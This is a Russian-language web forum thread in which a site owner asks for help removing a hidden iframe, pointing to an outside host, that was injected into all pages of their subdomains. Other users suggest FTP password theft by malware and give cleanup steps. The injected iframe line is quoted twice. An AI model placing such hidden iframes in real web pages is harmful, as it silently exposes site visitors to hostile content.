[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: i frame
anonymouse
Ребят спасите а то я или взорвусь и пошлю свой хостинг в (ВЫРЕЗАНО) и еще куда-то....
Или реально проблема от меня ?


У меня на хостинге куча под-доменов и с недавних пор появился вот такой код во всех стр.

HTML
<iframe src='http://tnx.name/in.cgi?3' width='1' height='1' style='visibility: hidden;'></iframe>


Вариантов было много НО !
Я пере залил файлы - просмотрел стр. и все равно код присутствует - самое что странное что когда обратно захожу на хост кода в файле нету - возможно чтобы сам сервер вставлял это код?

Так как я уже матом ругаюсь - а те коЗлы говорят что это типо ВИРУС у меня.
Какой нахрен вирус через ФТП и срабатывает сразу ? я считаю что это у них...


Может кто что встречал ? а то я уже все... валерьянку начинаю бухать !



Спустя 2 часа, 11 минут, 19 секунд (6.06.2009 - 20:58) FatCat написал(а):
Во-первых, вирус может быть на твоем компьютере: сам считывает пароли ФТП, сам лезет по ФТП и сам модифицирует файлы.
Во-вторых, код может быть в БД (если БД используется)...

Спустя 26 дней, 21 час, 47 минут, 15 секунд (3.07.2009 - 18:45) Сергей написал(а):
Цитата (anonymouse @ 6.06.2009 - 15:46)
Ребят спасите а то я или взорвусь и пошлю свой хостинг в (ВЫРЕЗАНО) и еще куда-то....
Или реально проблема от меня ?


У меня на хостинге куча под-доменов и с недавних пор появился вот такой код во всех стр.

HTML
<iframe src='http://tnx.name/in.cgi?3' width='1' height='1' style='visibility: hidden;'></iframe>


Вариантов было много НО !
Я пере залил файлы - просмотрел стр. и все равно код присутствует - самое что странное что когда обратно захожу на хост кода в файле нету - возможно чтобы сам сервер вставлял это код?

Так как я уже матом ругаюсь - а те коЗлы говорят что это типо ВИРУС у меня.
Какой нахрен вирус через ФТП и срабатывает сразу ? я считаю что это у них...


Может кто что встречал ?  а то я уже все... валерьянку начинаю бухать !

Тоже самое. Базу данных проверил. В интернете ничего не нашел. Подскажите, как с этим бороться?

Спустя 18 часов, 36 минут, 42 секунды (4.07.2009 - 13:22) ViaScientarium написал(а):
Проверить компьютер на вирусы. Поменять пароль от фтп. Удалить из файлов этот код.

Спустя 14 минут, 28 секунд (4.07.2009 - 13:36) PandoraBox2007 написал(а):
я с этим боролся сменой прав доступа на index.php index.html index.htm

555

Спустя 8 дней, 2 часа, 58 минут, 14 секунд (12.07.2009 - 16:34) Nikitian написал(а):
Как вариант - кэш. Если у движка есть кэширование, то после всех изменений не забывайте его обнулять


_____________
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.